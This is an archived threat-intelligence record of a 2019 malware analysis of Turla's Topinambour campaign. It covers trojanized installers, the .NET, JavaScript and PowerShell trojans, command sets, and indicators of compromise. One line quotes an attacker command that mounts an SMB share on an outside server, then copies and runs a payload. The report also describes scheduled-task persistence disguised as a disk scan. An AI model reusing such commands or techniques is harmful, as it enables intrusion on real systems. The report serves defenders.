{ "id": "0b5f846a-c88b-4e28-92fb-3d7605ae0426", "created_at": "2026-04-06T00:14:48.749345Z", "updated_at": "2026-04-10T13:11:23.853717Z", "deleted_at": null, "sha1_hash": "271a0a78250b906bdabc02c1dc53d2d4f97659c5", "title": "Turla renews its arsenal with Topinambour", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 249099, "plain_text": "Turla renews its arsenal with Topinambour\r\nBy GReAT\r\nPublished: 2019-07-15 · Archived: 2026-04-05 22:46:14 UTC\r\nTurla, also known as Venomous Bear, Waterbug, and Uroboros, is a Russian speaking threat actor known since\r\n2014, but with roots that go back to 2004 and earlier. It is a complex cyberattack platform focused predominantly\r\non diplomatic and government-related targets, particularly in the Middle East, Central and Far East Asia, Europe,\r\nNorth and South America and former Soviet bloc nations.\r\n2019 has seen the Turla actor actively renew its arsenal. Its developers are still using a familiar coding style, but\r\nthey’re creating new tools. Here we’ll tell you about several of them, namely “Topinambour” (aka Sunchoke – the\r\nJerusalem artichoke) and its related modules. We didn’t choose to name it after a vegetable; the .NET malware\r\ndevelopers named it Topinambour themselves.\r\nThe new modules were used in an active campaign that started at the beginning of 2019. As usual, the actor\r\ntargeted governmental entities. The role of the .NET module is to deliver the known KopiLuwak JavaScript\r\nTrojan. Moreover, this actor now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak.\r\nAmong the control servers there are several legitimate but compromised WordPress websites with the actor’s .php\r\nscripts on them.\r\nThis time, the developers left some Easter eggs for the targets and researchers. The .NET modules include\r\namusing strings such as “TrumpTower” as an initial vector for RC4 encryption. “RocketMan!” (probably a\r\nreference to Donald Trump’s nickname for Kim Jong Un) and “MiamiBeach” serve as the first beacon messages\r\nfrom the victim to the control server.\r\nHow Topinambour spreads\r\nTo deliver all this to targets, the operators use legitimate software installers infected with the Topinambour\r\ndropper. These could be tools to circumvent internet censorship, such as “Softether VPN 4.12” and “psiphon3”, or\r\nMicrosoft Office “activators”.\r\nThe dropper contains a tiny .NET shell that will wait for Windows shell commands from the operators. Using this\r\nand SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules\r\nusing just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through\r\npublic networks.\r\nThese campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with\r\n“197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”. Lateral\r\nmovements in the target’s infrastructure show how familiar the campaign operators are with the IPv6 protocol.\r\nAlong with IPv4 they use the newer version for shell commands and LAN addresses.\r\nWhat Topinambour wants from the targets\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 1 of 8\n\nThe purpose of all this infrastructure and modules in JavaScript, .NET and PowerShell is to build a “fileless”\r\nmodule chain on the victim’s computer consisting of an initial small runner and several Windows system registry\r\nvalues containing the encrypted remote administration tool. The tool does all that a typical Trojan needs to\r\naccomplish: upload, download and execute files, fingerprint target systems. The PowerShell version of the Trojan\r\nalso has the ability to get screenshots.\r\nTrojan Command set\r\nJavaScript exit upld inst wait dwld\r\n.NET #down #upload #timeout #stop #sync\r\nPowerShell #upload #down #screen #timeout #stop #sync\r\nEven the command system in the different Trojans is quite similar\r\nInteresting technical features\r\nA plausible hypothesis for developing similar malware in different languages could be to avoid detection: if one\r\nversion is detected on the victim’s computer, the operators can try an analogue in a different language. In the table\r\nbelow, we compare Trojans in terms of encryption keys in use and initial messages to control servers.\r\nTrojan RC4 encryption key Initial beacon to C2\r\nJavaScript\r\nKopiLuwak\r\n01a8cbd328df18fd49965d68e2879433\r\n“bYVAoFGJKj7rfs1M” plus hash based upon\r\nWindows installation date\r\n.NET TrumpTower RocketMan!\r\nPowerShell TimesNewRoman MiamiBeach\r\nFor some reason, the developers prefer to entertain targets and researchers instead of randomizing strings\r\nOur analysis of the dropper is based on the sample below:\r\nSHA256 8bcf125b442f86d24789b37ce64d125b54668bc4608f49828392b5b66e364284\r\nMD5 110195ff4d7298ba9a186335c55b2d1f\r\nCompiled 2018.09.10 12:08:14 (GMT)\r\nSize 1 159 680\r\nOriginal name topinambour.exe\r\nThe dropper sample on which our analysis is based implements the following features:\r\nDropper\r\nfunction\r\nFeatures\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 2 of 8\n\nunpack_p\r\nDrops payload to %LOCALAPPDATA%/VirtualStore/certcheck.exe. The “p” in the\r\nfunction name and corresponding resource in the dropper stands for “payload”\r\nmake_some_noise Gains persistence for payload with a scheduled task that starts every 30 minutes\r\nunpack_o\r\nDrops the original application that the dropper tries to mimic (such as psiphon3) to\r\n%TEMP%/activator.exe and runs it. Here “o” in the function name and corresponding\r\nresource in the dropper stands for “original”\r\nThe Topinambour authors decided to name the remote shell persistence function “make_some_noise()”\r\nDropped tiny .NET remote shell\r\nThe tiny dropped application gets Windows shell commands from the C2 and silently executes them.\r\nThe Topinambour tiny .NET shell first tries to get commands from an external IP, which looks like a LAN, and then\r\ncontinues with possibly infected LAN IPs\r\nThe first DWORD (four bytes) received after a TCP request to the C2 is the data size for the following\r\ncommunication. Then the data contained in the next packets will be the Windows shell command to silently\r\nexecute the application using “cmd.exe /c”. And that’s it – straightforward, simple and useful.\r\nKopiLuwak dropper\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 3 of 8\n\nThis is where the notorious KopiLuwak comes into play. The .NET remote shell silently downloads scripts from\r\nthe C2 – from the opened SMB share on a remote CELL-C VPS in South Africa to be precise. “Net use” and\r\n“copy” Windows shell commands are enough to fulfil the task.\r\ncmd.exe /c net use \\\\197.168.0.247\\c$ \u003cuser_pass_here\u003e /user:administrator \u0026 copy /y\r\n\\\\197.168.0.247\\c$\\users\\public\\documents\\i.js $documents\\j.js \u0026 $documents\\j.js\r\nAs a result, the victim is infected with a KopiLuwak obfuscated JavaScript.\r\nDeobfuscated KopiLuwak dropper that puts the RC4 decryption key into the scheduler task for next-stager\r\npersistence\r\nIts functions are described in the table below:\r\nScript\r\nfunction\r\nFeatures\r\nCreate\r\nscheduler\r\ntask\r\nCreates a task with the name ProactiveScan, description “NTFS Volume Health Scan”, which\r\nruns C:\\Users\\\u003cuser_name_here\u003e\\AppData\\Roaming\\Microsoft\\Chkdsk.js with the\r\nparameters “-scan Kdw6gG7cpOSZsBeH”, where the parameter is the RC4 decryption key\r\nFingerprint\r\nhost\r\nSaves a set of commands such as systeminfo, net view, tasklist /v, gpresult /z, dir\r\n\\x22%programfiles%\\x5cKaspersky Lab\\x22, tracert www.google.com to\r\n%appdata%\\Microsoft\\x5ct235.dat\r\nDrop next\r\nJavaScript\r\nDrops C:\\Users\\\u003cuser_name_here\u003e\\AppData\\Roaming\\Microsoft\\Chkdsk.js\r\nThe dropped “Chkdsk.js” decrypts one more script using the RC4 key provided in the dropper’s scheduled task\r\nand runs the decrypted code. This final stager is a more complex Trojan, able to parse and execute custom\r\ncommands from the C2.\r\nThe operators get the victim’s data in XML format: every message has a 16-byte signature at the beginning and a\r\nvictim-specific fingerprint that the developer calls “ridid”.\r\nConstant Bytes Value and features\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 4 of 8\n\nmagic 16\r\nEvery encrypted message from the infected host starts with this. In the samples\r\ndescribed, the magic bytes are ‘bYVAoFGJKj7rfs1M’.\r\nridid 32\r\nHash value, based on Windows installation date and the aforementioned 16-byte magic\r\nvalue\r\nRC4 iv 32\r\nRC4 initial vector to encrypt communication between the target and the C2. In the\r\nsamples described, the IV value is “01a8cbd328df18fd49965d68e2879433”\r\nDecrypted and deobfuscated target hashing algorithm, based on Windows installation date and 16-byte hardcoded\r\nstring\r\nThe malware communicates with a legitimate compromised WordPress-based website and gets four byte length\r\ncommands from URL like “http://\u003clegitimate domain\u003e/wp-includes/Requests/Socks.php”. First, the malware\r\nbeacons to its C2 and gets the command to execute as an answer.\r\nCommand Features\r\nexit\r\nSend “t235.dat” fingerprinting file content with “upl” text in the XML message, delete the file\r\nand stop script execution\r\nupld\r\nSend “t235.dat” content with “upl” text in XML message. If no such file exists, or it’s empty, it\r\nsends “opt file no exists or size limit” text in the XML message\r\ninst\r\nCommand format is:\r\n– three bytes after command – overall server response length\r\n– three following bytes – they are “jss”\r\n– Tail – JavaScript to execute\r\nSend ‘good install’ and “t235.dat” content in the XML messages. Save executed JavaScript file\r\nas %APPDATA%\\Microsoft\\ghke94d.jss\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 5 of 8\n\nwait Do nothing\r\ndwld\r\nCommand format is the same as for the “inst” command, but the script from the server will not\r\nbe executed at once. It saves the decrypted JavaScript as %APPDATA%\\Microsoft\\awgh43.js\r\nand sends ‘success get_parse_command’ in the XML message\r\nKopiLuwak JavaScript\r\nThe downloaded script takes a binary from the Windows registry and runs it. The registry subkeys and values vary\r\nfrom target to target.\r\nThe slightly obfuscated script used to run the payload from registry\r\nIt is not completely clear how the registry keys were created; however, the attackers usually use the .NET initial\r\ninfector for that. In some samples, there is an additional function to get the victim´s MAC address.\r\nThis is the end of first “JavaScript” infection chain. Now, let’s also briefly describe the second .NET-based chain.\r\n.NET RocketMan Trojan\r\nWe call this Trojan RocketMan after the string the developer uses for beaconing. Another string inside this\r\nmalware is “TrumpTower”, used as an RC4 encryption initial vector.\r\nThis malware reads the C2 IP and port from the registry where it was saved by the previous stager. It processes the\r\nfollowing commands from its C2 that are received encrypted over HTTP:\r\nCommand Features\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 6 of 8\n\n#down\r\nMake HTTP POST request to http://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/file to download the file with\r\nthe provided name to the victim’s computer\r\n#upload\r\nMake HTTP GET request to http://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/update, decrypt server response\r\nand upload the file to the server with the provided path and name\r\n#timeout Get the pause length from the server command argument and wait\r\n#stop Make HTTP GET request to http://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/exit, stop the Trojan operation\r\n#sync Send encrypted “RocketMan!” string to the server\r\nPowerShell MiamiBeach Trojan\r\nLast but not least, the developers behind the Topinambour campaign also used a PowerShell Trojan. This Trojan\r\ncontains around 450 strings and uses “TimesNewRoman” as the RC4 initial vector to encrypt C2 communications.\r\nThis module beacons to its hardcoded C2 with the string “MiamiBeach” using an HTTP POST. The Trojan is quite\r\nsimilar to the .NET RocketMan Trojan and can handle the same commands; additionally, it includes the “#screen”\r\ncommand to take a screenshot.\r\nConclusions\r\nThe reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize\r\ndetection of the well-known, publicly discussed JavaScript versions. Using the Windows system registry to store\r\nencrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the\r\ndigital footprint on any victim’s computer, where only a tiny starter would be left.\r\nIt’s a bit surprising, amusing and not entirely clear why the developers have used some seemingly US-related\r\nstrings such as “RocketMan!”, “TrumpTower” or “make_some_noise”. They are hardly likely to serve as false\r\nflags. The usage of KopiLuwak, a well-known and exclusive artefact previously used by the Turla group, makes\r\nus attribute this campaign to this actor with high confidence.\r\nIndicators of compromise\r\nC2 HTTP GET templates\r\nhttp://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/file\r\nhttp://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/update\r\nhttp://\u003cconfig_ip\u003e:\u003cconfig_port\u003e/exit\r\nSome campaign-related MD5 hashes\r\n47870ff98164155f088062c95c448783\r\n2c1e73da56f4da619c4c53b521404874\r\n6acf316fed472300fa50db54fa6f3cbc\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 7 of 8\n\n9573f452004b16eabd20fa65a6c2c1c4\r\n3772a34d1b731697e2879bef54967332\r\nd967d96ea5d0962e08844d140c2874e0\r\na80bbd753c07512b31ab04bd5e3324c2\r\n37dc2eb8ee56aeba4dbd4cf46f87ae9a\r\n710f729ab26f058f2dbf08664edb3986\r\nDomains and IPs\r\nVPSs used as control servers\r\n197.168.0.73\r\n197.168.0.98\r\n197.168.0.212\r\n197.168.0.243\r\n197.168.0.247\r\n197.168.0.250\r\nSource: https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nhttps://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/" ], "report_names": [ "91687" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434488, "ts_updated_at": 1775826683, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/271a0a78250b906bdabc02c1dc53d2d4f97659c5.pdf", "text": "https://archive.orkl.eu/271a0a78250b906bdabc02c1dc53d2d4f97659c5.txt", "img": "https://archive.orkl.eu/271a0a78250b906bdabc02c1dc53d2d4f97659c5.jpg" } }